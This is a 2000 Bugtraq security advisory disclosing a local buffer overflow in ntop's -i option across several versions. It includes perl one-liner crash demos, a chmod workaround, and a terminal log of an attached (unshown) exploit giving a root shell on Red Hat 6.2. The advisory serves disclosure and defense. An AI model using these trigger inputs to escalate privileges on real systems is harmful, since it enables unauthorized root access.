Date:         Tue, 24 Oct 2000 13:42:03 +0200
From: BAILLEUX Christophe <cb@GROLIER.FR>
Subject:      Security Advisory - ntop local buffer overflow vulnerability (fwd)
To: BUGTRAQ@SECURITYFOCUS.COM



Subject       : ntop local buffer overflow vulnerability
Author        : Christophe BAILLEUX (cb@grolier.fr)
Platforms     : *nix
Test versions : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2



I.      Problem

All ntop versions are vulnerable to a local buffer overflow attack through
the -i option (the argument that names the interface to listen on).
ntop must be owned by root and installed with the setuid bit for the
attacker to gain root privileges.



II.     Demo


a) ntop 1.1


tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
ntop v.1.1 MT [i686-pc-linux-gnu] listening on
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.1$


b) ntop 1.2a7

tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$



c) ntop 1.3.1


tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$


d) ntop 1.3.2

tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$




III.    Workaround

chmod ug-s path/to/ntop

ntop team has been informed (http://www.ntop.org).






IV.     Exploit (See Attachment)


Tested on Red Hat 6.2 (Zoot), where ntop is installed by default with the
setuid root bit set.


[cb@nux cb]$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
[cb@nux cb]$ rpm -qf /sbin/ntop
ntop-1.1-1
[cb@nux cb]$ id
uid=535(cb) gid=535(cb) groups=535(cb)
[cb@nux cb]$ ./expl

ntop v.1.1 MT [i586-pc-linux-gnu] listening on
..............................

Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
bash#
bash# id
uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
bash# exit
[cb@nux cb]$



Greetings to kalou, Bdev, cleb, dv, the PullthePlug Community and all those I
forgot.
Thanks to Teuk for letting me use his server to build and test the ntop Red Hat
6.2 exploit :)

Regards,


--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr
